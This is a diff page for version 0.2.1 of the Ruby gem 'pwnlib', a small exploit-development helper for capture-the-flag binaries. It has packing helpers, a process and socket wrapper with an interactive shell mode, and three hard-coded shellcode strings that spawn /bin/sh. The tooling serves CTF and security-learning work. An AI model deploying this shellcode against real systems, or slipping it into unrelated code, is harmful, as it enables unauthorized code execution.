pwnlib 0.2.0 → 0.2.1
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.gitignore +14 -0
- data/Gemfile +4 -0
- data/LICENSE +21 -0
- data/README.md +28 -0
- data/Rakefile +2 -0
- data/lib/pwnlib.rb +46 -0
- data/lib/pwnlib/process.rb +79 -0
- data/lib/pwnlib/version.rb +3 -0
- data/pwnlib.gemspec +23 -0
- metadata +13 -4
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: ff2b06f6519abcf757ecddf58841b5b1384b3640
|
4
|
+
data.tar.gz: e907d9101916780be928e8c6f9ee153714d5f75c
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 207c2e5472b9caa403cb3243699ba4bbe0bb73bd5cc09e042df0a94f6ed6e6a1b37b00dd68f972df5f170773ce6eee587910c9a342f01fb77c0b07130c959f52
|
7
|
+
data.tar.gz: cead4ef9102b344523de32d7c95a28b74030e00e4b69ea199e3c79defb6ef7e29b5d3d2717763dcc86743125c727084127bf8101642477e71eb9cde576a9c8ac
|
data/.gitignore
ADDED
data/Gemfile
ADDED
data/LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
The MIT License (MIT)
|
2
|
+
|
3
|
+
Copyright (c) 2016 Kyle Cook
|
4
|
+
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
7
|
+
in the Software without restriction, including without limitation the rights
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
10
|
+
furnished to do so, subject to the following conditions:
|
11
|
+
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
13
|
+
copies or substantial portions of the Software.
|
14
|
+
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
21
|
+
SOFTWARE.
|
data/README.md
ADDED
@@ -0,0 +1,28 @@
|
|
1
|
+
# Pwnlib
|
2
|
+
|
3
|
+
A simple gem used for creating exploits (usually for CTFs)
|
4
|
+
|
5
|
+
## Installation
|
6
|
+
|
7
|
+
Install with `gem install pwnlib` or use bundler
|
8
|
+
|
9
|
+
## Usage
|
10
|
+
|
11
|
+
Add
|
12
|
+
|
13
|
+
```ruby
|
14
|
+
require 'pwnlib'
|
15
|
+
include Pwnlib
|
16
|
+
|
17
|
+
p = process("./app")
|
18
|
+
|
19
|
+
p.close
|
20
|
+
```
|
21
|
+
|
22
|
+
## Contributing
|
23
|
+
|
24
|
+
1. Fork it ( https://github.com/[my-github-username]/pwnlib/fork )
|
25
|
+
2. Create your feature branch (`git checkout -b my-new-feature`)
|
26
|
+
3. Commit your changes (`git commit -am 'Add some feature'`)
|
27
|
+
4. Push to the branch (`git push origin my-new-feature`)
|
28
|
+
5. Create a new Pull Request
|
data/Rakefile
ADDED
data/lib/pwnlib.rb
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
require 'pwnlib/process'
|
2
|
+
require 'socket'
|
3
|
+
|
4
|
+
module Pwnlib
|
5
|
+
def p64 num
|
6
|
+
num = num.hex if num.is_a? String
|
7
|
+
[num].pack("Q")
|
8
|
+
end
|
9
|
+
|
10
|
+
def p32 num
|
11
|
+
num = num.hex if num.is_a? String
|
12
|
+
[num].pack("L")
|
13
|
+
end
|
14
|
+
|
15
|
+
def u32 num
|
16
|
+
num.unpack("L")[0]
|
17
|
+
end
|
18
|
+
|
19
|
+
def u64 num
|
20
|
+
num.unpack("Q")[0]
|
21
|
+
end
|
22
|
+
|
23
|
+
def process name
|
24
|
+
stdin, stdout, wait_thr = Open3.popen2e name
|
25
|
+
stdout.sync
|
26
|
+
stdin.sync
|
27
|
+
ProcessRun.new stdin, stdout
|
28
|
+
end
|
29
|
+
|
30
|
+
def remote name, port
|
31
|
+
s = TCPSocket.new name, port
|
32
|
+
ProcessRun.new s, s
|
33
|
+
end
|
34
|
+
|
35
|
+
def i386_shellcode
|
36
|
+
"\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80".force_encoding("ASCII-8BIT")
|
37
|
+
end
|
38
|
+
|
39
|
+
def i386_shellcode_alt
|
40
|
+
"\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05".force_encoding("ASCII-8BIT")
|
41
|
+
end
|
42
|
+
|
43
|
+
def i386_shellcode_magic
|
44
|
+
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05".force_encoding("ASCII-8BIT")
|
45
|
+
end
|
46
|
+
end
|
@@ -0,0 +1,79 @@
|
|
1
|
+
class ProcessRun
|
2
|
+
require 'open3'
|
3
|
+
|
4
|
+
def initialize stdin, stdout
|
5
|
+
@stdin = stdin
|
6
|
+
@stdout = stdout
|
7
|
+
@output_buf = []
|
8
|
+
|
9
|
+
@get_input = true
|
10
|
+
@stdout_thr = Thread.new do
|
11
|
+
while @get_input
|
12
|
+
data = @stdout.readpartial(4096)
|
13
|
+
if data
|
14
|
+
lines = data.split("\n")
|
15
|
+
@output_buf += lines
|
16
|
+
end
|
17
|
+
end
|
18
|
+
end
|
19
|
+
end
|
20
|
+
|
21
|
+
def output
|
22
|
+
sleep 0.1
|
23
|
+
@output_buf.each {|l| puts l; }
|
24
|
+
output_clear
|
25
|
+
end
|
26
|
+
|
27
|
+
def raw_buffer
|
28
|
+
sleep 0.1
|
29
|
+
@output_buf
|
30
|
+
end
|
31
|
+
|
32
|
+
def output_clear
|
33
|
+
sleep 0.1
|
34
|
+
@output_buf = []
|
35
|
+
end
|
36
|
+
|
37
|
+
def recv
|
38
|
+
sleep 0.1
|
39
|
+
@output_buf.shift
|
40
|
+
end
|
41
|
+
|
42
|
+
def send msg
|
43
|
+
@stdin.write msg
|
44
|
+
sleep 0.1
|
45
|
+
end
|
46
|
+
|
47
|
+
def write msg
|
48
|
+
File.open("sploit", "w") do |f|
|
49
|
+
f.puts msg
|
50
|
+
end
|
51
|
+
end
|
52
|
+
|
53
|
+
def interactive
|
54
|
+
while 1
|
55
|
+
print "\n$> "
|
56
|
+
input = gets.chomp
|
57
|
+
|
58
|
+
if input == "exit" or input == "quit"
|
59
|
+
break
|
60
|
+
end
|
61
|
+
|
62
|
+
@stdin.puts(input)
|
63
|
+
|
64
|
+
sleep 0.1
|
65
|
+
output
|
66
|
+
end
|
67
|
+
end
|
68
|
+
|
69
|
+
def close
|
70
|
+
@stdout.flush
|
71
|
+
@stdin.flush
|
72
|
+
@get_input = false
|
73
|
+
|
74
|
+
output
|
75
|
+
|
76
|
+
@stdin.close
|
77
|
+
@stdout.close unless @stdin == @stdout
|
78
|
+
end
|
79
|
+
end
|
data/pwnlib.gemspec
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
# coding: utf-8
|
2
|
+
lib = File.expand_path('../lib', __FILE__)
|
3
|
+
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
|
4
|
+
require 'pwnlib/version'
|
5
|
+
|
6
|
+
Gem::Specification.new do |spec|
|
7
|
+
spec.name = "pwnlib"
|
8
|
+
spec.version = Pwnlib::VERSION
|
9
|
+
spec.authors = ["Kyle Cook"]
|
10
|
+
spec.email = ["kylecook80@gmail.com"]
|
11
|
+
spec.summary = %q{Ruby binary pwning library}
|
12
|
+
spec.description = %q{Library used to create exploits for binaries}
|
13
|
+
spec.homepage = ""
|
14
|
+
spec.license = "MIT"
|
15
|
+
|
16
|
+
spec.files = `git ls-files -z`.split("\x0")
|
17
|
+
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
|
18
|
+
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
|
19
|
+
spec.require_paths = ["lib"]
|
20
|
+
|
21
|
+
spec.add_development_dependency "bundler", "~> 1.7"
|
22
|
+
spec.add_development_dependency "rake", "~> 10.0"
|
23
|
+
end
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: pwnlib
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.2.
|
4
|
+
version: 0.2.1
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Kyle Cook
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2016-01-
|
11
|
+
date: 2016-01-31 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: bundler
|
@@ -38,13 +38,22 @@ dependencies:
|
|
38
38
|
- - "~>"
|
39
39
|
- !ruby/object:Gem::Version
|
40
40
|
version: '10.0'
|
41
|
-
description: Library used to create exploits for
|
41
|
+
description: Library used to create exploits for binaries
|
42
42
|
email:
|
43
43
|
- kylecook80@gmail.com
|
44
44
|
executables: []
|
45
45
|
extensions: []
|
46
46
|
extra_rdoc_files: []
|
47
|
-
files:
|
47
|
+
files:
|
48
|
+
- ".gitignore"
|
49
|
+
- Gemfile
|
50
|
+
- LICENSE
|
51
|
+
- README.md
|
52
|
+
- Rakefile
|
53
|
+
- lib/pwnlib.rb
|
54
|
+
- lib/pwnlib/process.rb
|
55
|
+
- lib/pwnlib/version.rb
|
56
|
+
- pwnlib.gemspec
|
48
57
|
homepage: ''
|
49
58
|
licenses:
|
50
59
|
- MIT
|